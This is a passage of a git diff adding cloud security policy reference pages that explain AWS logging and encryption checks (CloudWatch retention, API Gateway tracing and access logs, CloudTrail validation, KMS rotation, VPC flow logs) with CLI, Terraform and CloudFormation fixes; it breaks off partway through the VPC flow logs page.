+|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py[CKV_AWS_66] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling CloudWatch retention establishes how long log events are kept in AWS CloudWatch Logs. +Retention settings are assigned to CloudWatch log groups, and the retention period assigned to a log group is applied to its log streams. +Any data older than the current retention setting is deleted automatically. +You can change the log retention for each log group at any time. +Log data is stored in CloudWatch Logs indefinitely by default. +This may incur unexpectedly high costs, especially when combined with other forms of logging.
+We recommend you configure how long log data is stored in each log group, to balance cost against compliance retention requirements. + +//// +=== Fix - Runtime + + +*AWS Console* + + +Procedure: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/cloudwatch/[Amazon CloudWatch console]. + +. In the navigation pane, choose *Log Groups*. + +. Find the log group to update. + +. In the *Expire Events After* column for that log group, choose the current retention setting, such as Never Expire. + +. In *Edit Retention*, for Retention, choose a log retention value, then click *Ok*. + + +*CLI Command* + + +Sets the retention of the specified log group. +A retention policy allows you to configure the number of days for which to retain log events in the specified log group. + + +[source,shell] +---- +put-retention-policy +--log-group-name <value> +--retention-in-days <value> +[--cli-input-json <value>] +[--generate-cli-skeleton <value>] +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudwatch_log_group +* *Arguments:* retention_in_days - (Optional) Specifies the number of days you want to retain log events in the specified log group. +Possible values are: 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, 3653, and 0. +If you select 0, the events in the log group are always retained and never expire. + + +[source,go] +---- +resource "aws_cloudwatch_log_group" "example" { + ... + name = "example" ++ retention_in_days = 90 +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Logs::LogGroup +* *Arguments:* Properties.RetentionInDays - (Optional) Specifies the number of days you want to retain log events in the specified log group. +Possible values are: 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, and 3653. +If RetentionInDays is omitted, the events in the log group are always retained and never expire. + + +[source,yaml] +---- +Resources: + logGroup: + Type: AWS::Logs::LogGroup + Properties: + ... ++ RetentionInDays: 90 +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc new file mode 100644 index 000000000..44257a8a0 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc @@ -0,0 +1,121 @@ +== API Gateway does not have X-Ray tracing enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00eb12be-f74f-4c18-b80b-4720bbfc5f69 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayXray.py[CKV_AWS_73] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +When an API Gateway stage has the active tracing feature enabled, the Amazon API Gateway service automatically samples API invocation requests based on the sampling algorithm specified by AWS X-Ray. +With tracing enabled, X-Ray can provide an end-to-end view of an entire HTTP request. +You can use this to analyze latencies in APIs and their backend services. + +//// +=== Fix - Runtime + + +*AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/apigateway[Amazon API Gateway console]. + +. In the APIs pane, choose the API, and then click *Stages*. + +. In the *Stages* pane, choose the name of the stage. + +. In the *Stage Editor* pane, choose the *Logs/Tracing* tab. + +. To enable active X-Ray tracing, choose *Enable X-Ray Tracing* under X-Ray Tracing.
+ + +*CLI Command* + + + + +[source,shell] +---- +aws apigateway create-stage \ + --rest-api-id {rest-api-id} \ + --stage-name {stage-name} \ + --deployment-id {deployment-id} \ + --region {region} \ + --tracing-enabled=true +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_stage +* *Arguments:* xray_tracing_enabled - (Optional) Whether active tracing with X-Ray is enabled. +Defaults to false. + + +[source,go] +---- +resource "aws_api_gateway_stage" "test" { + ... + stage_name = "prod" ++ xray_tracing_enabled = true + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ApiGateway::Stage +* *Arguments:* Properties.TracingEnabled + + +[source,yaml] +---- +Resources: + MyStage: + Type: AWS::ApiGateway::Stage + Properties: + ... ++ TracingEnabled: true + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc new file mode 100644 index 000000000..e1ce61c98 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc @@ -0,0 +1,93 @@ +== Global Accelerator does not have Flow logs enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c2e68e0-bf05-48ac-b3e6-0470bb9fffa0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py[CKV_AWS_75] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Global Accelerator is a networking service that sends traffic through AWS's global network, enabling global access to your web apps. +Flow logs allow capturing information about the IP address traffic going to and from network interfaces in the AWS Global Accelerator.
+Flow log data is published to Amazon S3, where it can be retrieved and viewed. +Flow logs enable troubleshooting if specific traffic is not reaching an endpoint, helping you to diagnose overly restrictive security group rules. +They can also be used to monitor the traffic that is reaching endpoints in a VPC and establish whether they should be receiving that traffic. + +//// +=== Fix - Runtime + + +*CLI Command* + + + +. Create an S3 bucket for your flow logs. + +. Add an IAM policy for the AWS user who is enabling the flow logs. + +. Run the following command, with the S3 bucket name and prefix that you want to use for your log files: ++ + +[source,shell] +---- +aws globalaccelerator update-accelerator-attributes + --accelerator-arn arn:aws:globalaccelerator::012345678901:accelerator/1234abcd-abcd-1234-abcd-1234abcdefgh + --region us-west-2 + --flow-logs-enabled + --flow-logs-s3-bucket s3-bucket-name + --flow-logs-s3-prefix s3-bucket-prefix +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* aws_globalaccelerator_accelerator +* *Arguments:* flow_logs_enabled - (Optional) Indicates whether flow logs are enabled.
+ + +[source,go] +---- +resource "aws_globalaccelerator_accelerator" "example" { + name = "Example" + ip_address_type = "IPV4" + enabled = true + + attributes { ++ flow_logs_enabled = true ++ flow_logs_s3_bucket = "example-bucket" ++ flow_logs_s3_prefix = "flow-logs/" + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc new file mode 100644 index 000000000..1c6f2ee6c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc @@ -0,0 +1,117 @@ +== API Gateway does not have access logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ee1d5c78-3a80-4fa3-b3c7-01eece8e7b63 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py[CKV_AWS_76] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling the custom access logging option in API Gateway allows delivery of custom logs to CloudWatch Logs, which can be analyzed using CloudWatch Logs Insights. +Using custom domain names in Amazon API Gateway allows insights into requests sent to each custom domain name. +If there is more than one custom domain name mapped to a single API, understanding the quantity and type of requests by domain name may help you understand request patterns. + +//// +=== Fix - Runtime + + +*AWS Console* + + +Procedure: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/apigateway/[Amazon API Gateway console]. + +. Find the Stage Editor for your API. + +. On the *Stage Editor* pane, choose the *Logs/Tracing* tab. + +. 
On the Logs/Tracing tab, under CloudWatch Settings, do the following to enable execution logging. + +. Select the *Enable CloudWatch Logs* check box. + +. For Log level, choose *INFO* to generate execution logs for all requests. ++ +Or, choose *ERROR* to generate execution logs only for requests to your API that result in an error. + +. Select the Log full requests/responses data check box for a REST API. ++ +Or, select the Log full message data check box for a WebSocket API. + +. Under *Custom Access Logging*, select the Enable Access Logging check box. + +. For *Access Log Destination ARN*, enter the ARN of a CloudWatch log group or an Amazon Kinesis Data Firehose stream. + +. Enter a Log Format. ++ +For guidance, you can choose CLF, JSON, XML, or CSV to see an example in that format. + +. Click *Save Changes*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_stage +* *Arguments:* access_log_settings - (Optional) Enables access logs for the API stage. + + +[source,go] +---- +resource "aws_api_gateway_stage" "test" { + ... + stage_name = "prod" ++ access_log_settings { ++ destination_arn = "${aws_cloudwatch_log_group.example.arn}" ++ format = "..." ++ } + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ApiGateway::Stage +* *Arguments:* Properties.AccessLogSetting.DestinationArn + + +[source,yaml] +---- +Resources: + MyStage: + Type: AWS::ApiGateway::Stage + Properties: + ... + AccessLogSetting: + DestinationArn: 'arn:aws:logs:us-east-1:123456789:log-group:example-log-group' + Format: "..." + ... 
+---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc new file mode 100644 index 000000000..76c2a8e26 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc @@ -0,0 +1,159 @@ +== Amazon MSK cluster logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24e0785e-0e5e-43db-95d3-3744d810d98b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterLogging.py[CKV_AWS_80] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon MSK enables you to build and run applications that use Apache Kafka to process streaming data. +It also provides a control plane for advanced operations, for example, creating, updating, and deleting clusters. +Consistent cluster logging helps you determine if a request was made with root or AWS Identity and Access Management (IAM) user credentials and whether the request was made with temporary security credentials for a role or federated user. + +//// +=== Fix - Runtime + + +*AWS Console* + + +*New Cluster*: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/msk/[Amazon MSK console]. + +. Go to *Broker Log Delivery* in the *Monitoring* section. + +. Specify the destinations to which you want Amazon MSK to deliver your broker logs. ++ +*Existing Cluster*: + +. In the https://console.aws.amazon.com/msk/[Amazon MSK console], choose the cluster from your list of clusters. + +. Go to the *Details* tab. ++ +Scroll down to the *Monitoring* section and click *Edit*. + +. Specify the destinations to which you want Amazon MSK to deliver your broker logs.
+ + +*CLI Command* + + +When you use the https://docs.aws.amazon.com/cli/latest/reference/kafka/create-cluster.html[create-cluster] or the https://docs.aws.amazon.com/cli/latest/reference/kafka/update-monitoring.html[update-monitoring] commands, you can optionally specify the logging-info parameter and pass to it a JSON structure. +In this JSON, all three destination types are optional. + + +[source,json] +---- +{ + "BrokerLogs": { + "S3": { + "Bucket": "ExampleBucketName", + "Prefix": "ExamplePrefix", + "Enabled": true + }, + + "Firehose": { + "DeliveryStream": "ExampleDeliveryStreamName", + "Enabled": true + }, + + "CloudWatchLogs": { + "Enabled": true, + "LogGroup": "ExampleLogGroupName" + } + } +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_msk_cluster +* *Arguments:* logging_info - (Optional) Configuration block for streaming broker logs to CloudWatch/S3/Kinesis Firehose. + +See below. + + +[source,go] +---- +resource "aws_msk_cluster" "example" { + cluster_name = "example" + ... ++ logging_info { ++ broker_logs { ++ cloudwatch_logs { ++ enabled = true ++ log_group = aws_cloudwatch_log_group.test.name ++ } ++ } ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::MSK::Cluster +* *Argument:* LoggingInfo. +Configure your MSK cluster to send broker logs to different destination types. +This is a container for the configuration details related to broker logs. + + +[source,json] +---- +{ + "Type" : "AWS::MSK::Cluster", + "Properties" : { + ... ++ "LoggingInfo" : { ++ "BrokerLogs" : { ++ "CloudWatchLogs" : CloudWatchLogs, ++ "Firehose" : Firehose, ++ "S3" : S3 + } + } + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc new file mode 100644 index 000000000..e09f5a837 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc @@ -0,0 +1,100 @@ +== AWS DocumentDB logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0c7e0ca3-8c29-43a8-831b-b561ffb5d996 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/DocDBLogging.py[CKV_AWS_85] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The events recorded by the AWS DocumentDB audit logs include: successful and failed authentication attempts, creating indexes, or dropping a collection in a database within the DocumentDB cluster. +Amazon CloudWatch Logs is a service that monitors, stores, and provides access to your log files from a variety of sources within your AWS account. +When logging is enabled, information such as Data Definition Language, authentication, authorization, and user management events are sent to CloudWatch Logs. +This information can be used to analyze, monitor, and archive your Amazon DocumentDB auditing events for security and compliance requirements. + +//// +=== Fix - Runtime + + +*AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/docdb[Amazon DocumentDB console]. + +. In the navigation pane, choose *Clusters*. + +. Specify the cluster that you want to modify by choosing the button to the left of the cluster's name. + +. Choose *Actions*, then click *Modify*. + +. 
In the *Modify Cluster: <cluster-name>* pane, go to *Log Exports* and enable exporting audit or profiler logs. + + +*CLI Command* + + +Use the modify-db-cluster operation to modify the specified cluster using the AWS CLI. + + +[source,shell] +---- +aws docdb modify-db-cluster \ + --db-cluster-identifier sample-cluster \ + --cloudwatch-logs-export-configuration '{"EnableLogTypes":["audit"]}' +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster +* *Arguments:* enabled_cloudwatch_logs_exports - (Optional) List of log types to export to CloudWatch. +If omitted, no logs will be exported. +The following log types are supported: audit, profiler. + + +[source,go] +---- +resource "aws_docdb_cluster" "docdb" { + cluster_identifier = "my-docdb-cluster" + ... ++ enabled_cloudwatch_logs_exports = ["audit", "profiler"] +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc new file mode 100644 index 000000000..536db0511 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc @@ -0,0 +1,131 @@ +== AWS CloudTrail log validation is not enabled in all regions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 38e3d3cf-b694-46ec-8bd2-8f02194b5040 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py[CKV_AWS_36] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +CloudTrail log file validation creates a digitally signed digest file containing a hash of each log that CloudTrail writes to S3.
+These digest files can be used to determine whether a log file was changed, deleted, or unchanged after CloudTrail delivered the log. +We recommend enabling log file validation on all trails to provide additional integrity checking of CloudTrail logs. + +//// +=== Fix - Runtime + + +*AWS Console* + + +To enable log file validation on a given trail, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/cloudtrail/[CloudTrail console]. + +. On the left navigation pane, click *Trails*. + +. Select the target trail. + +. Navigate to the *S3* section, click the edit icon (pencil). + +. Click *Advanced*. + +. In the *Enable log file validation* section, select *Yes*. + +. Click *Save*. + + +*CLI Command* + + +To enable log file validation on an AWS CloudTrail, use the following command: +[,bash] +---- +aws cloudtrail update-trail +--name <trail_name> +--enable-log-file-validation +---- +To start periodic validation of logs using these digests, use the following command: +[,bash] +---- +aws cloudtrail validate-logs +--trail-arn <trail_arn> +--start-time <start_time> +--end-time <end_time> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* enable_log_file_validation - (Optional) Specifies whether log file integrity validation is enabled. +Defaults to false. + + +[source,go] +---- +resource "aws_cloudtrail" "trail_1" { + ... + name = "terraform.env-trail-01" ++ enable_log_file_validation = true +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudTrail::Trail +* *Arguments:* Properties.EnableLogFileValidation + + +[source,yaml] +---- +Resources: + myTrail: + Type: AWS::CloudTrail::Trail + Properties: + ... ++ EnableLogFileValidation: True +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc new file mode 100644 index 000000000..e90d6e48e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc @@ -0,0 +1,150 @@ +== AWS CloudFront distribution with access logging disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a719209-0c06-4f42-a33e-9f0107a76fa9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py[CKV_AWS_86] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +CloudFront access logs contain detailed information (requested object name, date and time of the access, client IP, access point, error code, etc.) about each request made for your web content. +This information can be extremely useful during security audits, or as input data for various analytics/reporting tools. +Pairing with Lambda and WAF logs could help expedite a response process and possibly enable blocking requests coming from IP addresses that generate multiple errors. +Such spikes in errors could indicate attackers trying to find vulnerabilities within your web application. + +//// +=== Fix - Runtime + + +*AWS CloudFront Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/cloudfront/home[Amazon CloudFront console]. + +. Select a *CloudFront Distribution* that is missing access logging. + +. From the menu, click *Distribution Settings* to get into the configuration page. + +. From the *General* tab on the top menu, click *Edit*. + +. 
In the *Distribution Settings* tab, scroll down and verify the *Logging* feature configuration status.
++
+If Logging is Off, CloudFront cannot create log files that contain detailed information about every user request that it receives.
+
+. Click *ON* to initiate the Logging feature of CloudFront to log all viewer requests for files in your distribution.
+
+
+*CLI Command*
+
+
+
+. Create an S3 bucket to store your access logs.
+
+. Create a JSON file to enable logging and set an S3 bucket location to configure a destination for log files.
++
+
+[source,json]
+----
+{
+  "ETag": "ETAGID001",
+  "DistributionConfig": {
+    ...
+    "Logging": {
+      "Bucket": "cloudfront-logging.s3.amazonaws.com",
+      "Enabled": true
+    }
+  }
+}
+----
+
+. Run update-distribution to update your distribution with your distribution id, the path of the configuration file, and your etag.
++
+
+[source,shell]
+----
+aws cloudfront update-distribution \
+--id ID000000000000 \
+--distribution-config file://logging.json \
+--if-match ETAGID001
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+* *Resource:* aws_cloudfront_distribution
+* *Arguments:* logging_config (Optional) - The logging configuration that controls how logs are written to your distribution (maximum one).
+
+
+[source,go]
+----
+resource "aws_cloudfront_distribution" "s3_distribution" {
+  ...
+  default_root_object = "index.html"
++ logging_config {
++   bucket = "mylogs.s3.amazonaws.com"
+  ...
+  }
+}
+----
+
+
+*CloudFormation*
+
+
+
+* *Resource:* AWS::CloudFront::Distribution
+* *Arguments:* Properties.DistributionConfig.Logging/Bucket
+
+
+[source,yaml]
+----
+Resources:
+  MyCloudFrontDistribution:
+    Type: 'AWS::CloudFront::Distribution'
+    Properties:
+      ...
+      DistributionConfig:
+        ...
++       Logging:
++         Bucket: myawslogbucket.s3.amazonaws.com
+----
diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc
new file mode 100644
index 000000000..be319ed88
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc
@@ -0,0 +1,109 @@
+== AWS Config is not enabled in all regions
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 706ba56f-78d7-4bd6-ad76-f716914e0b63
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py[CKV_AWS_121]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+AWS Config is a web service that performs the configuration management of supported AWS resources within your account and delivers log files to you.
+The recorded information includes: the configuration item (AWS resource), relationships between configuration items (AWS resources), and any configuration changes between resources.
+The AWS configuration item history captured by AWS Config enables security analysis, resource change tracking, and compliance auditing.
+We recommend you enable AWS Config in all regions.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To implement AWS Config configuration using the AWS Management Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. At the top right of the console, select the _region_ you want to focus on.
+
+. Click *Services*.
+
+. Click *Config*.
+
+. Define which resources you want to record in the selected region.
++
+Include global resources (IAM resources).
+
+. 
Select an _S3 bucket_ in the same account, or in another managed AWS account.
+
+. Create an _SNS Topic_ from the same AWS account, or from another managed AWS account.
+
+
+*CLI Command*
+
+
+To change the policy, use the following steps and commands:
+
+. Ensure there is an appropriate S3 bucket, SNS topic, and IAM role per the AWS Config Service prerequisites.
+
+. Set up the configuration recorder:
++
+[,bash]
+----
+aws configservice subscribe \
+--s3-bucket my-config-bucket \
+--sns-topic arn:aws:sns:us-east-1:012345678912:my-config-notice \
+--iam-role arn:aws:iam::012345678912:role/myConfigRole
+----
+
+. Start the configuration recorder:
++
+[,bash]
+----
+aws configservice start-configuration-recorder \
+--configuration-recorder-name <value>
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_config_configuration_aggregator
+* *Arguments:* all_regions
+
+
+[source,go]
+----
+resource "aws_config_configuration_aggregator" "organization" {
+  name = "example"
+  account_aggregation_source {
+    account_ids = ["123456789012"]
++   all_regions = true
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc
new file mode 100644
index 000000000..37ac55b7d
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc
@@ -0,0 +1,105 @@
+== AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c2b84f89-7ec8-473e-a6af-404feeeb96c5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py[CKV_AWS_35]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS CloudTrail is a web service that records AWS API calls for an account, and makes those logs available to users and resources in accordance with IAM policies.
+AWS Key Management Service (KMS) is a managed service that helps create and control the encryption keys used to encrypt account data.
+It uses Hardware Security Modules (HSMs) to protect the security of encryption keys.
+CloudTrail logs can be configured to leverage server-side encryption (SSE) and KMS customer created master keys (CMK) to further protect CloudTrail logs.
+We recommend that CloudTrail logs are configured to use SSE-KMS, providing additional confidentiality controls on log data.
+A given user must have S3 read permission on the corresponding log bucket and must be granted decrypt permission by the CMK policy.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To configure CloudTrail to use SSE-KMS using the Management Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/cloudtrail/[Amazon CloudTrail console].
+
+. In the left navigation pane, click *Trails*.
+
+. Select a _Trail_.
+
+. Navigate to the *S3* section and click the edit button (pencil icon).
+
+. Click *Advanced*.
+
+. From the *KMS key Id* drop-down menu, select an existing CMK.
++
+NOTE: Ensure the CMK is located in the same region as the S3 bucket.
+
+. For CloudTrail as a service to encrypt and decrypt log files using the CMK provided, apply a KMS Key policy on the selected CMK.
+
+. Click *Save*.
+
+. You will see a notification message stating that you need to have decrypt permissions on the specified KMS key to decrypt log files.
++
+Click *Yes*. 
+
+
+*CLI Command*
+
+
+To update the trail and apply the key policy, use the following commands:
+
+[,bash]
+----
+aws cloudtrail update-trail \
+--name <trail_name> \
+--kms-key-id <cloudtrail_kms_key>
+
+aws kms put-key-policy \
+--key-id <cloudtrail_kms_key> \
+--policy <cloudtrail_kms_key_policy>
+----
+////
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::CloudTrail::Trail
+* *Arguments:* Properties.KMSKeyId
+
+
+[source,yaml]
+----
+Resources:
+  myTrail:
+    Type: AWS::CloudTrail::Trail
+    Properties:
+      ...
++     KMSKeyId: alias/MyAliasName
+----
diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc
new file mode 100644
index 000000000..91914f36e
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc
@@ -0,0 +1,143 @@
+== AWS Customer Master Key (CMK) rotation is not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 497f7e2c-b702-47c7-9a07-f0f6404ac896
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KMSRotation.py[CKV_AWS_7]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+=== Description
+
+
+AWS Key Management Service (KMS) allows customers to rotate the backing key.
+This is where key material is stored within KMS and tied to the key ID of the customer-created customer master key (CMK).
+The backing key is used to perform cryptographic operations such as encryption and decryption.
+Automated key rotation currently retains all prior backing keys, allowing decryption of encrypted data to take place transparently.
+We recommend you enable CMK key rotation to help reduce the potential impact of a compromised key.
+Data encrypted with a new key cannot be accessed with a previous key that may have been exposed.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+Procedure:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/kms/home[Amazon KMS console].
+
+. In the left navigation pane, select *Customer managed keys*.
+
+. Select the customer master key (CMK) in scope.
+
+. Navigate to the *Key Rotation* tab.
+
+. Select *Rotate this key every year*.
+
+. Click *Save*.
+
+
+*CLI Command*
+
+
+Change the policy to enable key rotation using the following CLI command:
+
+[,bash]
+----
+aws kms enable-key-rotation --key-id <kms_key_id>
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_kms_key
+* *Arguments:* enable_key_rotation - (Optional) Specifies whether key rotation is enabled.
+Defaults to false.
+
+
+[source,go]
+----
+resource "aws_kms_key" "kms_key_1" {
+  ...
+  is_enabled          = true
++ enable_key_rotation = true
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* `AWS::KMS::Key`
+* *Attribute*: `EnableKeyRotation` - (Optional) Specifies whether key rotation is enabled.
+Defaults to false.
+
+
+[source,yaml]
+----
+Type: AWS::KMS::Key
+Properties:
+  ...
++ EnableKeyRotation: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc
new file mode 100644
index 000000000..0a85bef6c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc
@@ -0,0 +1,93 @@
+== AWS VPC Flow Logs not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 49f4760d-c951-40e4-bfe1-08acaa17672a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml[CKV2_AWS_11]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+VPC Flow Logs is a feature that enables you to capture information about the IP traffic going to and from network interfaces in your VPC.
+After you have created a flow log, you can view and retrieve its data in Amazon CloudWatch Logs.
+VPC Flow Logs provide visibility into network traffic that traverses the VPC.
+We recommend that VPC Flow Logs are enabled for packet Rejects for VPCs to help detect anomalous traffic and provide insight during security workflows.
+
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To determine whether VPC Flow Logs are enabled, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
